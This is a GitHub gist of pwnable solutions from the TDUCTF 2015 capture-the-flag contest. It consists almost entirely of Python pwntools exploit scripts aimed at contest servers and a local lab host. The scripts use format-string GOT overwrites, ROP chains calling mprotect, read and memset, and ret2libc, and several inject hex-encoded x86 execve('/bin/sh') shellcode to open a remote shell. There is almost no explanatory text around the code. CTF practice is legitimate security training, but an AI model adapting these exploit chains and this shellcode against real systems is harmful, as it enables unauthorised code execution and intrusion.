Last active
August 31, 2015 09:41
-
-
Save rekkusu/6c9edaa805832418624d to your computer and use it in GitHub Desktop.
TDUCTF 2015 Pwnable writeup
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from libformatstr import FormatStr | |
| import time | |
| s = remote('crackme.sakura.tductf.org', 10773) | |
| read_secret = 0x0804875d | |
| strlen_got = 0x8049138 | |
| exit_got = 0x804912c | |
| puts_plt = 0x8048580 | |
| s.recvuntil('You: ') | |
| fmt = FormatStr() | |
| fmt[strlen_got] = puts_plt | |
| fmt[exit_got] = read_secret | |
| payload = fmt.payload(6) | |
| s.send(payload + '\n') | |
| s.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from libformatstr import FormatStr | |
| import time | |
| s = remote('crackme.sakura.tductf.org', 10773) | |
| sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex') | |
| buf = 0x80491a0 | |
| exit_got = 0x804912c | |
| s.recvuntil('You: ') | |
| fmt = FormatStr() | |
| fmt[exit_got] = buf | |
| payload = fmt.payload(6) | |
| s.send(payload + '\n') | |
| s.send(sc + '\n') | |
| s.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import time | |
| s = remote('crackme.sakura.tductf.org', 10195) | |
| sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex') | |
| read_plt = 0x080483a0 | |
| mprotect_plt = 0x8048390 | |
| popret = 0x8048365 | |
| pop3ret = 0x80485d9 | |
| buf = 0x8049000 | |
| payload = ''.join([ | |
| 'A' * 16, | |
| p32(mprotect_plt), | |
| p32(pop3ret), | |
| p32(buf), | |
| p32(0x1000), | |
| p32(0x7), | |
| p32(read_plt), | |
| p32(popret), | |
| p32(0), | |
| p32(buf), | |
| p32(0x100) | |
| ]) | |
| print 'len:', len(payload) | |
| assert(len(payload) <= 0x38) | |
| s.send(payload) | |
| time.sleep(0.5) | |
| s.send(sc) | |
| s.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # She'll code ... | |
| from pwn import * | |
| import time | |
| s = remote('crackme.sakura.tductf.org', 47806) | |
| sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex') | |
| buf = 0x8049aa0 | |
| s.recvuntil('about you:') | |
| s.send(p32(buf + 4) + sc + '\n') | |
| s.recvuntil('message:') | |
| payload = ''.join([ | |
| 'A' * 38, | |
| p32(0x8049aa0 + 4) | |
| ]) | |
| s.send(payload + '\n') | |
| s.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ret2libc for newbie | |
| from pwn import * | |
| s = remote('crackme.sakura.tductf.org', 10170) | |
| system_plt = 0x8048410 | |
| binsh = 0x80486ad | |
| s.send('A' * 16 + p32(system_plt) + 'BBBB' + p32(binsh)) | |
| s.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import time | |
| s = remote('crackme.sakura.tductf.org', 20562) | |
| # waiting pieces | |
| time.sleep(2) | |
| sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex') | |
| pop3ret = 0x8048b19 | |
| memset_plt = 0x8048660 | |
| s.recvuntil('Pieces will be here: ') | |
| executable = int(s.recvuntil('\n'), 16) | |
| print 'exec:', hex(executable) | |
| payload = '' | |
| for i in range(len(sc)): | |
| payload += ''.join([ | |
| p32(memset_plt), | |
| p32(pop3ret), | |
| p32(executable + i), | |
| p32(ord(sc[i])), | |
| p32(1), | |
| ]) | |
| payload += p32(executable) | |
| s.send(payload) | |
| s.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import time | |
| # memset無し版(CTF終了後解いた) | |
| #s = remote('crackme.sakura.tductf.org', 20562) | |
| s = remote('192.168.6.129', 4000) | |
| # waiting pieces | |
| time.sleep(2) | |
| s.recvuntil('Pieces will be here: ') | |
| piece = int(s.recvuntil('\n'), 16) | |
| print 'piece:', hex(piece) | |
| s.recvuntil('board: ') | |
| rop_buf = int(s.recvuntil('\n'), 16) | |
| print 'rop_buf:', hex(rop_buf) | |
| int80 = piece & 0xffff0000 | 0x80cd | |
| payload = ''.join([ | |
| p32(piece + 0x10), # pop eax | |
| p32(int80), | |
| p32(piece + 0x50), # mov [eax], ax | |
| p32(piece + 0x10), # pop eax | |
| p32(11), | |
| p32(piece + 0x16), # pop ebx | |
| p32(rop_buf + 0x80), | |
| p32(piece + 0x12), # pop ecx | |
| p32(0), | |
| p32(piece + 0x14), # pop edx | |
| p32(0), | |
| p32(int80) | |
| ]) | |
| payload = payload.ljust(0x80, 'A') + '/bin/sh\0' | |
| s.send(payload) | |
| s.interactive() | |
| ''' | |
| pieces | |
| 00000000 50 push eax | |
| 00000001 C3 ret | |
| 00000002 51 push ecx | |
| 00000003 C3 ret | |
| 00000004 52 push edx | |
| 00000005 C3 ret | |
| 00000006 53 push ebx | |
| 00000007 C3 ret | |
| 00000008 54 push esp | |
| 00000009 C3 ret | |
| 0000000A 55 push ebp | |
| 0000000B C3 ret | |
| 0000000C 56 push esi | |
| 0000000D C3 ret | |
| 0000000E 57 push edi | |
| 0000000F C3 ret | |
| 00000010 58 pop eax | |
| 00000011 C3 ret | |
| 00000012 59 pop ecx | |
| 00000013 C3 ret | |
| 00000014 5A pop edx | |
| 00000015 C3 ret | |
| 00000016 5B pop ebx | |
| 00000017 C3 ret | |
| 00000018 5C pop esp | |
| 00000019 C3 ret | |
| 0000001A 5D pop ebp | |
| 0000001B C3 ret | |
| 0000001C 5E pop esi | |
| 0000001D C3 ret | |
| 0000001E 5F pop edi | |
| 0000001F C3 ret | |
| 00000020 83C404 add esp,byte +0x4 | |
| 00000023 C3 ret | |
| 00000024 83C408 add esp,byte +0x8 | |
| 00000027 C3 ret | |
| 00000028 83C40C add esp,byte +0xc | |
| 0000002B C3 ret | |
| 0000002C 83EC04 sub esp,byte +0x4 | |
| 0000002F C3 ret | |
| 00000030 83EC08 sub esp,byte +0x8 | |
| 00000033 C3 ret | |
| 00000034 83EC0C sub esp,byte +0xc | |
| 00000037 C3 ret | |
| 00000038 FFD0 call eax | |
| 0000003A C3 ret | |
| 0000003B FFD1 call ecx | |
| 0000003D C3 ret | |
| 0000003E FFD2 call edx | |
| 00000040 C3 ret | |
| 00000041 FFD3 call ebx | |
| 00000043 C3 ret | |
| 00000044 FFD4 call esp | |
| 00000046 C3 ret | |
| 00000047 FFD5 call ebp | |
| 00000049 C3 ret | |
| 0000004A FFD6 call esi | |
| 0000004C C3 ret | |
| 0000004D 8900 mov [eax],eax | |
| 0000004F C3 ret | |
| 00000050 668900 mov [eax],ax | |
| 00000053 C3 ret | |
| 00000054 8800 mov [eax],al | |
| 00000056 C3 ret | |
| 00000057 8820 mov [eax],ah | |
| 00000059 C3 ret | |
| ''' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import time | |
| sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex') | |
| relocation = 0x8048560 | |
| read_offset = 0x8 | |
| #s = remote('crackme.sakura.tductf.org', 20562) | |
| s = remote('192.168.6.129', 4000) | |
| # waiting pieces | |
| time.sleep(2) | |
| s.recvuntil('Pieces will be here: ') | |
| piece = int(s.recvuntil('\n'), 16) | |
| print 'piece:', hex(piece) | |
| s.recvuntil('board: ') | |
| rop_buf = int(s.recvuntil('\n'), 16) | |
| print 'rop_buf:', hex(rop_buf) | |
| payload = ''.join([ | |
| p32(relocation), | |
| p32(read_offset), | |
| p32(piece), | |
| p32(0), | |
| p32(piece), | |
| p32(0x100), | |
| ]) | |
| s.send(payload) | |
| time.sleep(0.5) | |
| s.send(sc) | |
| s.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # shellcode for newbie | |
| from pwn import * | |
| s = remote('crackme.sakura.tductf.org', 10150) | |
| sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd8000'.decode('hex') | |
| s.send(sc.ljust(256, '\0')) | |
| s.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment